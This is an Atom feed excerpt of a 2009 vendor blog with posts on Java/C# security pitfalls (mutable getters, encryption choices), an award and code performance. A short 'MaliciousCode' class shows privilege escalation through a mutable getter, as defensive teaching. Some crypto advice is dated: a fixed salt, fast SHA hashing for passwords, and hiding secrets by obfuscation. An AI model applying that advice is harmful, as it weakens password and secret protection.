  OOP makes it possible to protect data through keywords that define its &lt;strong&gt;visibility&lt;/strong&gt; from the rest of the application, according to the location of classes: &lt;code&gt;private&lt;/code&gt;, &lt;code&gt;protected&lt;/code&gt;, &lt;code&gt;public&lt;/code&gt;, &lt;code&gt;internal&lt;/code&gt; (C#), ... Other keywords prevent a class from being extended or a method from being overridden: &lt;code&gt;final&lt;/code&gt; (Java) or &lt;code&gt;sealed&lt;/code&gt; (C#). Configuring accessibility is not trivial: it requires finding the &lt;strong&gt;right balance&lt;/strong&gt; between security and extensibility, while keeping the code simple.
&lt;/p&gt;

&lt;p&gt;
  Regarding the visibility of class attributes, the developer must add accessors to expose them while keeping a way to check or modify the data. Since this work is not very rewarding, since the code gets burdened with methods (and properties in C#) which do nothing but set or return attributes, and since developers are lazy by nature, these attributes are sometimes declared as non-private.
&lt;/p&gt;

&lt;p&gt;
  As for the overriding of classes or methods, most developers do not bother to finalize/seal their code, and do not consider the &lt;strong&gt;risks&lt;/strong&gt;.
&lt;/p&gt;

&lt;p&gt;
  These risks may be classified into two types:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;ill-intentioned&lt;/strong&gt; uses from third-party code. This objection is often theoretical, because class loaders do not easily allow such exploitation. However, some designs based on plugins or dependency injection make these vulnerabilities easier to exploit
  &lt;li&gt;implementations that were originally well-intentioned may introduce flaws by &lt;strong&gt;overriding critical functions&lt;/strong&gt; which should be protected, for example a method retrieving user rights.
&lt;/ul&gt;

&lt;p&gt;
  Developers must therefore always pay attention to the visibility of critical data and processing.
&lt;/p&gt;
  
&lt;h3&gt;Exposure of mutable data&lt;/h3&gt;
&lt;p&gt;
  Another area that is difficult to manage in OOP and has a direct impact on security is the exposure of &lt;strong&gt;mutable attributes&lt;/strong&gt;. A mutable object is an object whose state can be changed after initialization, e.g. an array or a &lt;code&gt;StringBuilder&lt;/code&gt;, but also most of the &lt;a href = "http://en.wikipedia.org/wiki/Plain_Old_Java_Object"&gt;POJOs&lt;/a&gt; / &lt;a href = "http://en.wikipedia.org/wiki/Plain_Old_CLR_Object"&gt;POCOs&lt;/a&gt; created in an application.
&lt;/p&gt;

&lt;p&gt;
  The problem is that a &lt;em&gt;getter&lt;/em&gt; on a mutable attribute does not only grant read access: it allows the caller to &lt;strong&gt;change the state of this attribute&lt;/strong&gt;. A list of user rights could therefore be easily changed:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  private Set&amp;lt;UserRole&gt; roles = new HashSet&amp;lt;UserRole&gt;();

  ...
  
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return roles;
  }
}

public class MaliciousCode
{
  public void someMethod()
  {
    User user = userRegistry.findUser("myUserId");
    user.getRoles().add(UserRole.Admin);
  }
}
&lt;/pre&gt;

&lt;p&gt;
  To guard against such problems, several defensive options are available:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;return a &lt;strong&gt;copy&lt;/strong&gt; of the attribute:
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return new HashSet&amp;lt;UserRole&gt;(roles);
  }
}
&lt;/pre&gt;
    &lt;p&gt;
      In some cases, the copy must be a deep clone: e.g. if the attribute is a list of mutable objects, each mutable object in the list must also be cloned. The drawback is that callers do not hold the original instance: if the attribute is updated somewhere, the copies will not be synchronized.
   &lt;/p&gt;
 &lt;/li&gt;

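  &lt;li&gt;return a &lt;strong&gt;proxy&lt;/strong&gt; wrapping the mutable object and blocking update methods. For example:
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    // Read-only view: reads are delegated to the original set, no copy is made
    return new AbstractSet&amp;lt;UserRole&gt;()
    {
      @Override
      public int size()
      {
        return roles.size();
      }

      @Override
      public boolean contains(Object o)
      {
        return roles.contains(o);
      }

      @Override
      public Iterator&amp;lt;UserRole&gt; iterator()
      {
        final Iterator&amp;lt;UserRole&gt; it = roles.iterator();
        return new Iterator&amp;lt;UserRole&gt;()
        {
          public boolean hasNext() { return it.hasNext(); }
          public UserRole next() { return it.next(); }
          public void remove() { throw new UnsupportedOperationException(); }
        };
      }
    };
  }
}
&lt;/pre&gt;
    &lt;p&gt;
      Every update path must be blocked: here &lt;code&gt;add()&lt;/code&gt; is already rejected by &lt;code&gt;AbstractSet&lt;/code&gt;, and removals are rejected through the iterator. Compared to the previous option, the advantage is that you can finely control access to each method and, most importantly, callers keep seeing the original instance through the proxy.
   &lt;/p&gt;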

    &lt;p&gt;
      Java also provides an API that makes collections read-only using this same mechanism, through the class &lt;code&gt;java.util.Collections&lt;/code&gt;. For example:
   &lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return Collections.unmodifiableSet(roles);
  }
}
&lt;/pre&gt;
 &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;
  In any case, these mechanisms should be reserved for situations where the exposed data is critical, in order to avoid degrading performance through unnecessary instantiations.
&lt;/p&gt;

&lt;p&gt;
  &lt;strong&gt;To be continued...&lt;/strong&gt; In the next post, we will discuss issues related to code injection.
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-358773503723756773?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/358773503723756773/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/11/empirical-overview-of-security_18.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/358773503723756773?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/358773503723756773?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/FJdcIj6WwXY/empirical-overview-of-security_18.html" title="Empirical overview of security vulnerabilities [2/4]" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/11/empirical-overview-of-security_18.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUCSX87fip7ImA9WxNUGEs.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-5096630830478619386</id><published>2009-11-10T14:53:00.005+01:00</published><updated>2009-11-10T16:51:08.106+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-10T16:51:08.106+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Empirical overview of security vulnerabilities [1/4]</title><content type="html">&lt;p&gt;
   The objective of this four-part article is to provide an overview of the security issues identified through the &lt;a href="http://www.kalistick.com/index.php/english/Cockpit"&gt;Cockpit&lt;/a&gt;. Unlike other surveys, which rely on more or less exhaustive theoretical approaches, the approach here is &lt;strong&gt;empirical&lt;/strong&gt;: the problems mentioned are those we detect through automated analyses of our customers' projects (static analysis of Java or C# code). We have selected the ones that seem most useful as a booster shot for developers who are not yet sensitive to the security dimension.
&lt;/p&gt;

&lt;h2&gt;Preamble&lt;/h2&gt;
&lt;p&gt;
   The results are not reassuring: many security rules, even basic ones, are often ignored during development. This is even less reassuring when you know that these applications sometimes belong to critical sectors: banking, insurance, health... Several factors probably explain this:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;developers are often &lt;strong&gt;motivated&lt;/strong&gt; by innovation, technical challenges and the addition of new features, whereas security calls for a paranoid mindset, requires mature technologies and architectures, and becomes fragile as soon as new elements are introduced
   &lt;li&gt;&lt;strong&gt;an obvious lack of training&lt;/strong&gt;. We all presume that every developer knows security as a prerequisite, but few schools or companies really educate (future) developers about security concerns
   &lt;li&gt;&lt;strong&gt;security-oriented tests&lt;/strong&gt; are rarely performed during acceptance phases, which are often limited to checking functional and architectural behavior. When &lt;a href="http://en.wikipedia.org/wiki/Black-box_testing"&gt;black box&lt;/a&gt; tests are implemented (e.g. exploratory testing of the application over HTTP), they do not catch every issue that &lt;a href="http://en.wikipedia.org/wiki/White_box_testing"&gt;white box&lt;/a&gt; tests detect, and they sometimes come too late to allow a fixing campaign on the code.
&lt;/ul&gt;

&lt;h2&gt;Any quality problem inside code is a potential security issue!&lt;/h2&gt;
&lt;p&gt;
   We present here various security issues that are poorly addressed in development, but everyone must also understand the following assertion: &lt;strong&gt;any quality problem inside code is a potential security issue&lt;/strong&gt;. Some basic detections such as self-assignments (&lt;code&gt;someVar = someVar;&lt;/code&gt;), inverted conditions (&lt;code&gt;if (someValue.someMethod() &amp;amp;&amp;amp; (someValue != null))&lt;/code&gt;), infinite recursive calls, creation of unnecessary instances inside loops, unchecked method results, etc. are likely to create security issues:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;unexpected behavior (validation of erroneous form data, wrong permissions added to users, confidential data displayed, ...)
   &lt;li&gt;application crash (lack of memory, execution stack full, ...)
&lt;/ul&gt;
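&lt;p&gt;
   As an illustration of the first category, the sketch below shows how a self-assignment can silently leave a user with wider permissions than requested. The &lt;code&gt;Session&lt;/code&gt; and &lt;code&gt;FixedSession&lt;/code&gt; classes are hypothetical names invented for this example; they do not come from any analyzed project.
&lt;/p&gt;
&lt;pre class="brush:java"&gt;public class SelfAssignmentDemo {

    /** Hypothetical session object with a self-assignment bug. */
    static class Session {
        private boolean readOnly; // a boolean field defaults to false

        Session(boolean readOnly) {
            // BUG: the parameter is assigned to itself, the field is never set.
            readOnly = readOnly;
        }

        boolean isReadOnly() {
            return readOnly;
        }
    }

    /** Same class with the assignment corrected. */
    static class FixedSession {
        private final boolean readOnly;

        FixedSession(boolean readOnly) {
            this.readOnly = readOnly;
        }

        boolean isReadOnly() {
            return readOnly;
        }
    }

    public static void main(String[] args) {
        // A read-only session is requested in both cases.
        System.out.println(new Session(true).isReadOnly());      // prints false
        System.out.println(new FixedSession(true).isReadOnly()); // prints true
    }
}
&lt;/pre&gt;
&lt;p&gt;
   The buggy version compiles without error, which is why this kind of defect is a good candidate for automated detection.
&lt;/p&gt;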

&lt;p&gt;
   This article describes some quality rules that have a direct impact on security. This first part starts with the use of encryption algorithms.
&lt;/p&gt;

&lt;h2&gt;Encryption algorithms&lt;/h2&gt;
&lt;p&gt;
   The choice of an encryption algorithm is crucial. First, because it is often &lt;strong&gt;difficult to change the algorithm&lt;/strong&gt; once it has been used in the application (for example, if you stored your passwords as MD5 fingerprints and want to move to SHA, the stored fingerprints cannot be converted: a password entered by a user and hashed with SHA can no longer be compared with its stored MD5 value).
&lt;/p&gt;

&lt;p&gt;
Second, because it is obviously necessary to select a &lt;strong&gt;robust algorithm&lt;/strong&gt;. To avoid implementing custom algorithms of doubtful reliability, projects often resort to standard algorithms whose specifications are public: MD5, AES, RSA, ... But two problems arise:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;these algorithms do not have an &lt;strong&gt;endless lifetime&lt;/strong&gt;! Growing computing power and the constant search for security holes make obsolete some algorithms that were considered unbreakable yesterday. Developers must keep up with the news. Yet broken algorithms such as DES (symmetric algorithm) or MD5 (fingerprint algorithm) are still widespread in code. Even if they are not always dangerous in the short term (like MD5), you have to anticipate that they could persist in the project for several years.
   &lt;li&gt;these algorithms must be &lt;strong&gt;configured&lt;/strong&gt;: key size, passwords, &lt;a href="http://en.wikipedia.org/wiki/Salt_%28cryptography%29"&gt;salt&lt;/a&gt;, padding, ... Again, some knowledge is needed to use these algorithms securely. For example, storing passwords with a fingerprint algorithm (MD5, SHA ...) without a &lt;em&gt;salt&lt;/em&gt; to protect against &lt;a href="http://en.wikipedia.org/wiki/Rainbow_table"&gt;rainbow table&lt;/a&gt; attacks makes no sense.
&lt;/ul&gt;
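&lt;p&gt;
   To make the role of the salt concrete, here is a minimal Java sketch using only the standard &lt;code&gt;MessageDigest&lt;/code&gt; and &lt;code&gt;SecureRandom&lt;/code&gt; classes. The class name, the 16-byte salt length and the choice of one random salt per password are assumptions made for this illustration, not a description of any particular project.
&lt;/p&gt;
&lt;pre class="brush:java"&gt;import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;

public class SaltedFingerprint {

    /** Generates a random 16-byte salt, to be stored next to the fingerprint. */
    static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    /** Returns the hex-encoded SHA-256 fingerprint of salt followed by password. */
    static String fingerprint(byte[] salt, String password) throws NoSuchAlgorithmException {
        MessageDigest digest = MessageDigest.getInstance("SHA-256");
        digest.update(salt);
        byte[] hash = digest.digest(password.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : hash) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }

    public static void main(String[] args) throws NoSuchAlgorithmException {
        byte[] saltA = newSalt();
        byte[] saltB = newSalt();
        // Same password, different salts: the fingerprints differ,
        // so a table precomputed without the salt does not match them.
        System.out.println(fingerprint(saltA, "secret").equals(fingerprint(saltB, "secret")));
        // Same password, same salt: the fingerprint is reproducible,
        // which is what password verification relies on.
        System.out.println(fingerprint(saltA, "secret").equals(fingerprint(saltA, "secret")));
    }
}
&lt;/pre&gt;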

&lt;p&gt;
   &lt;strong&gt; Recommendations &lt;/strong&gt;:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;&lt;strong&gt;Use up-to-date algorithms&lt;/strong&gt;. For example: &lt;strong&gt;SHA&lt;/strong&gt; (the SHA-2 family, e.g. SHA-256) for fingerprints, &lt;strong&gt;AES&lt;/strong&gt; for symmetric encryption or &lt;strong&gt;RSA&lt;/strong&gt; for asymmetric encryption.
   &lt;li&gt;Use keys of &lt;strong&gt;sufficient size&lt;/strong&gt;. For example &lt;strong&gt;128&lt;/strong&gt; bits for AES or &lt;strong&gt;2048&lt;/strong&gt; bits for RSA. See &lt;a href="http://en.wikipedia.org/wiki/Key_size"&gt;Wikipedia: Key size&lt;/a&gt;.
   &lt;li&gt;Take care to configure the algorithms properly:
     &lt;ul&gt;
       &lt;li&gt;systematically add a &lt;em&gt;salt&lt;/em&gt; to fingerprints of confidential data (obviously not to identification data such as file checksums). For example: &lt;code&gt;sha256("a fixed and original value" + somePassword)&lt;/code&gt;
       &lt;li&gt;use padding options, and good ones. For example, the &lt;a href="http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding"&gt;OAEP padding&lt;/a&gt; with RSA (Java: &lt;code&gt;Cipher.getInstance("RSA/ECB/OAEPPadding")&lt;/code&gt;, C#: &lt;code&gt;RSACryptoServiceProvider.Encrypt(dataToEncrypt, true)&lt;/code&gt;)
     &lt;/ul&gt;
   &lt;/li&gt;
   &lt;li&gt;Hide passwords and &lt;em&gt;salts&lt;/em&gt;. Unless they can be requested interactively when the application starts, they have to be stored somewhere, so use the least accessible way: burying them in code (code obfuscation, dynamic generation, dispersal, ...), encrypting them in external files (which then requires storing other passwords ...), etc.
&lt;/ul&gt;
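&lt;p&gt;
   The key-size and padding recommendations can be sketched as follows with the standard Java cryptography API. The class and method names are hypothetical, and the transformation string &lt;code&gt;RSA/ECB/OAEPWithSHA-256AndMGF1Padding&lt;/code&gt; is one possible OAEP variant chosen for this example; treat it as an illustration rather than a reference configuration.
&lt;/p&gt;
&lt;pre class="brush:java"&gt;import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import javax.crypto.Cipher;

public class RsaOaepSketch {

    // OAEP padding is requested explicitly instead of relying on a provider default.
    static final String TRANSFORMATION = "RSA/ECB/OAEPWithSHA-256AndMGF1Padding";

    /** Generates an RSA key pair with a 2048-bit modulus. */
    static KeyPair newKeyPair() throws Exception {
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
        generator.initialize(2048);
        return generator.generateKeyPair();
    }

    /** Encrypts with the public key. */
    static byte[] encrypt(KeyPair keys, byte[] clear) throws Exception {
        Cipher cipher = Cipher.getInstance(TRANSFORMATION);
        cipher.init(Cipher.ENCRYPT_MODE, keys.getPublic());
        return cipher.doFinal(clear);
    }

    /** Decrypts with the private key. */
    static byte[] decrypt(KeyPair keys, byte[] encrypted) throws Exception {
        Cipher cipher = Cipher.getInstance(TRANSFORMATION);
        cipher.init(Cipher.DECRYPT_MODE, keys.getPrivate());
        return cipher.doFinal(encrypted);
    }

    public static void main(String[] args) throws Exception {
        KeyPair keys = newKeyPair();
        byte[] encrypted = encrypt(keys, "confidential".getBytes(StandardCharsets.UTF_8));
        System.out.println(encrypted.length); // 256 bytes for a 2048-bit key
        System.out.println(new String(decrypt(keys, encrypted), StandardCharsets.UTF_8));
    }
}
&lt;/pre&gt;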

&lt;p&gt;
   &lt;strong&gt;To be continued...&lt;/strong&gt; In the next part, we will discuss issues related to concurrency and object encapsulation.
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-5096630830478619386?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/5096630830478619386/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/11/empirical-overview-of-security.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/5096630830478619386?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/5096630830478619386?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/CIplS731TGg/empirical-overview-of-security.html" title="Empirical overview of security vulnerabilities [1/4]" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/11/empirical-overview-of-security.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEcNRX07eSp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-2074624661000971881</id><published>2009-07-09T11:49:00.004+02:00</published><updated>2009-10-05T14:34:54.301+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:34:54.301+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="news" /><category scheme="http://www.blogger.com/atom/ns#" term="awards" /><title>Innovation Prize2009  from European Security and Information System Congress</title><content type="html">&lt;p style="height:60px"&gt;&lt;img 
src="http://www.lesassisesdelasecurite.com/portals/4/images/logos/logo_assises_fr.png" mce_src="http://www.lesassisesdelasecurite.com/portals/4/images/logos/logo_assises_fr.png" alt=" " align="left" width="233" height="59" /&gt;&lt;img src="http://www.lesassisesdelasecurite.com/Portals/4/Skins/Assises/images/new_prix_inovation.png" mce_src="http://www.lesassisesdelasecurite.com/Portals/4/Skins/Assises/images/new_prix_inovation.png" alt="Prix de l'Innovation" title="Prix de l'Innovation" align="right" width="189" height="59" /&gt;
&lt;/p&gt;

&lt;p&gt;
A new award in our trophy room: the &lt;a href="http://www.les-assises-de-la-securite.com/"&gt;2009 Innovation Prize from the European Security and Information System Congress&lt;/a&gt;!
&lt;/p&gt;

&lt;p&gt;
This prize matters because of its reputation and because of its jury, composed of the security managers of several top firms (SNCF, BNP Paribas, SFR, etc.). It particularly delighted us by highlighting the security dimension of our platform:
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
Firstly, it acknowledges our SaaS model as being innovative and perfectly adapted to the security needs of our customers. We worked very hard to guarantee the confidentiality of the code analyzed on our servers, and our customers’ assessments have always been excellent. This prize provides additional confirmation :-)
&lt;/li&gt;
&lt;li&gt;
Secondly, it confirms our vision that security must be taken into account right at the beginning of the software development by continuously checking the source code to avoid bad practices that create vulnerabilities and to increase the security knowledge of the software development teams.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;
The &lt;a href="http://www.lesassisesdelasecurite.com/Home.aspx"&gt;European Security and Information System Congress&lt;/a&gt; takes place in Monaco, from October 7th 2009 to October 10th 2009. We have a dedicated booth and we will be glad to present our solution.
&lt;/p&gt;

&lt;p&gt;
&lt;a href="http://www.lesassisesdelasecurite.com/Home/Prix/tabid/676/language/en-US/Default.aspx"&gt;Link to the Assises website &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
&lt;a href="http://www.kalistick.com/index.php/english/Home.html"&gt;Link to the Kalistick website &lt;/a&gt;
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-2074624661000971881?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/2074624661000971881/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/innovation-prize-from-assises-de-la.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2074624661000971881?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2074624661000971881?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/f0xSuH7TKE8/innovation-prize-from-assises-de-la.html" title="Innovation Prize2009  from European Security and Information System Congress" /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/innovation-prize-from-assises-de-la.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUUESX4yeCp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-8826280044863824790</id><published>2009-07-02T11:47:00.001+02:00</published><updated>2009-10-05T14:53:28.090+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:53:28.090+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="java" /><category scheme="http://www.blogger.com/atom/ns#" term="practice" /><category scheme="http://www.blogger.com/atom/ns#" term="c#" /><title>Statistical analysis of code to improve its performance</title><content type="html">&lt;p&gt;We recently published a &lt;a 
href="http://www.kalistick.fr/index.php/Societe/Actualites/La-Societe-Generale-ameliore-une-application-strategique.html"&gt;Société Générale testimonial&lt;/a&gt; explaining that the company had successfully cut the duration of one of its processes from &lt;strong&gt;20 minutes to 20 seconds&lt;/strong&gt; by using our &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Quality Cockpit&lt;/a&gt; on one of its projects.&lt;/p&gt;  &lt;p&gt;Too good to be credible? Let's see how a statistical analysis of code helps to detect performance problems earlier, whether they are related to CPU or to memory.&lt;/p&gt;  &lt;h2&gt;One Example&lt;/h2&gt; &lt;p&gt; Here is a first example. It occurs often, and it is very easy to follow:&lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;User findUser(UserManager userManager, String id)
{
...
if (userManager.retrieveUser(id) != null)
{
 User user = userManager.retrieveUser(id);
 ...
}
...
}
&lt;/pre&gt;  &lt;p&gt; This is a typical violation of the &lt;a href="http://en.wikipedia.org/wiki/Don%27t_repeat_yourself"&gt;DRY&lt;/a&gt; principle: the same processing is performed twice in the code. The developer may have found it cumbersome to declare the &lt;em&gt;user&lt;/em&gt; variable before the &lt;em&gt;if&lt;/em&gt; statement, or may simply have made a careless copy/paste. Perhaps the call to the &lt;em&gt;retrieveUser&lt;/em&gt; method was assumed to put a negligible load on the system. However, this code presents several problems: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;The developer may have read the code of the &lt;em&gt;retrieveUser&lt;/em&gt; method at a given moment, but cannot know how this method will evolve afterwards. For example, the implementation might use a fast in-memory cache at first and later switch to a database lookup. Unnecessary calls that went unnoticed before may eventually impact performance. &lt;/li&gt;&lt;li&gt;Following the same principle, we cannot control where our own method will be called. If the &lt;em&gt;findUser&lt;/em&gt; method is inefficient, this is not necessarily serious when it is called only once, such as when the user logs in. If the method comes to be called regularly, such as for each page viewed on a very active site, then its performance becomes critical. &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt; This problem is common in object-oriented programming because of the encapsulation principle: we cannot rely on how a service is implemented, only on its contract (e.g. a method's signature). This is especially true with dependency injection (&lt;a href="http://en.wikipedia.org/wiki/Inversion_of_control"&gt;IoC&lt;/a&gt;). &lt;/p&gt; &lt;p&gt; This is one of the most common pitfalls in performance problems. A real problem might be hidden in less visible code for a while before becoming truly critical. 
That is why it is important to correct these problems as early as possible. &lt;/p&gt;  &lt;h2&gt;Some Recurring Causes&lt;/h2&gt; &lt;p&gt; In performance-related anomalies affecting our platform, we can identify some categories of recurring problems: &lt;/p&gt;  &lt;h3&gt;Poorly managed concurrent access&lt;/h3&gt; &lt;p&gt; Without even addressing the problem of &lt;a href="http://en.wikipedia.org/wiki/Deadlock"&gt;deadlocks&lt;/a&gt;, we regularly find unnecessary synchronizations. For example, instead of synchronizing on a field, the whole method is synchronized, which can slow down processing. This is also why we suggest having a rule to prohibit synchronizations at the method level so as to encourage developers to target and control their synchronizations better. &lt;/p&gt;  &lt;p&gt; Similarly, &lt;em&gt;thread-safe&lt;/em&gt; classes are sometimes used when their non-synchronized version should be used, which consumes less resources (ex: in Java, &lt;code&gt;java.util.ArrayList&lt;/code&gt; for a &lt;code&gt;java.util.Vector&lt;/code&gt;). &lt;/p&gt;  &lt;h3&gt;Poor memory management&lt;/h3&gt; &lt;p&gt; Just because a language has a &lt;a href="http://en.wikipedia.org/wiki/Garbage_collection_%28computer_science%29"&gt;garbage collector&lt;/a&gt; to automatically clean objects in memory, that doesn't mean that we don't need to pay attention to memory management.  &lt;/p&gt;  &lt;p&gt; First of all, there are often direct calls to the &lt;em&gt;garbage collector&lt;/em&gt;. This practice is not recommended because it can skew its internal algorithms and thereby reduce performance for the next cleanings. &lt;/p&gt;  &lt;p&gt;However, resources need to be freed up. 
This includes removing references to objects that are no longer being used and, for C#, managing &lt;em&gt;Disposable&lt;/em&gt; better, such as by releasing the &lt;em&gt;Disposable&lt;/em&gt; attributes in the finalizer or declaring classes with native attributes to be &lt;em&gt;Disposable&lt;/em&gt;. &lt;/p&gt;  &lt;p&gt; We also find bad practices related to unnecessary instantiations: &lt;/p&gt; &lt;ul&gt;&lt;li&gt;Declaration of non-static loggers. Generally, a logger object is associated with a class, and there is no need to create a specific instance for each of the class's objects. The logger should be declared as static. &lt;/li&gt;&lt;li&gt;Instantiations of objects that use only static methods   &lt;/li&gt;&lt;li&gt;Redundant instantiations in loops   &lt;/li&gt;&lt;li&gt;... &lt;/li&gt;&lt;/ul&gt;  &lt;h3&gt;Unnecessary code&lt;/h3&gt; &lt;p&gt; A simple way to improve performance is to track down unnecessary code: &lt;/p&gt; &lt;ul&gt;&lt;li&gt;Redundant casting &lt;pre class="brush:csharp"&gt;if (o is User)
handleUser(o as User);
&lt;/pre&gt; The C# &lt;em&gt;is&lt;/em&gt; operator already performs the type check, so following it with &lt;em&gt;as&lt;/em&gt; checks the type a second time; a single &lt;em&gt;as&lt;/em&gt; followed by a null test is enough.   &lt;/li&gt;&lt;li&gt;Instantiated, but unused variables (dead code)   &lt;/li&gt;&lt;li&gt;Writing to logs without checking the trace level &lt;pre class="brush:java"&gt;User findUser(UserManager userManager, String id)
{
User user = ...

List&amp;lt;Project&amp;gt; projects = projectManager.findProjects(user);
LOGGER.debug("User found: " + user + ",available projects:" + projects);

return user;
}
&lt;/pre&gt; Here, a project list is retrieved only to be displayed in a debug log. This operation should only run if the application is in debug mode, so the applicable code should be surrounded by a trace-level check, e.g. &lt;code&gt;if (LOGGER.isDebugEnabled())&lt;/code&gt; with log4j   &lt;/li&gt;&lt;li&gt;Unnecessary tests &lt;pre class="brush:csharp"&gt;if (true)
{
...
}
&lt;/pre&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;h3&gt;Insufficient knowledge of the language&lt;/h3&gt; &lt;p&gt; Some performance problems are quite simply due to a lack of knowledge of the language and its basic classes. Here are a few examples: &lt;/p&gt;  &lt;ul&gt;&lt;li&gt;In C#: &lt;code&gt;if (someString == "")&lt;/code&gt;. The test for an empty character string should be done with &lt;em&gt;System.String.IsNullOrEmpty(System.String)&lt;/em&gt;, which generates lighter IL code.   &lt;/li&gt;&lt;li&gt;In C#: &lt;code&gt;public static readonly Int32 someConstant=128&lt;/code&gt;. A constant should be declared with the keyword &lt;em&gt;const&lt;/em&gt;: &lt;code&gt;public const Int32 someConstant=128&lt;/code&gt;. The generated IL code will then use the constant value directly and will therefore perform better.   &lt;/li&gt;&lt;li&gt;In Java: &lt;code&gt;String s = new String("kalistick")&lt;/code&gt;. This always instantiates a new object, whereas the literal form &lt;code&gt;String s = "kalistick"&lt;/code&gt; reuses the JVM's character string cache.    &lt;/li&gt;&lt;li&gt;In Java: &lt;code&gt;Integer i = new Integer(args[0])&lt;/code&gt;. Same thing. Since Java 5, a cache of frequently used numeric values is available. This cache is used by writing &lt;code&gt;Integer i = Integer.valueOf(args[0])&lt;/code&gt;.    &lt;/li&gt;&lt;li&gt;In Java: &lt;code&gt;String s = "value = " + args[0]&lt;/code&gt;. A classic error that often shows up during profiling. Character strings that are built up in several steps, especially inside loops, should be concatenated using the &lt;code&gt;StringBuffer&lt;/code&gt; or &lt;code&gt;StringBuilder&lt;/code&gt; class (unless the concatenated terms are constants, in which case the compiler will optimize the concatenation). 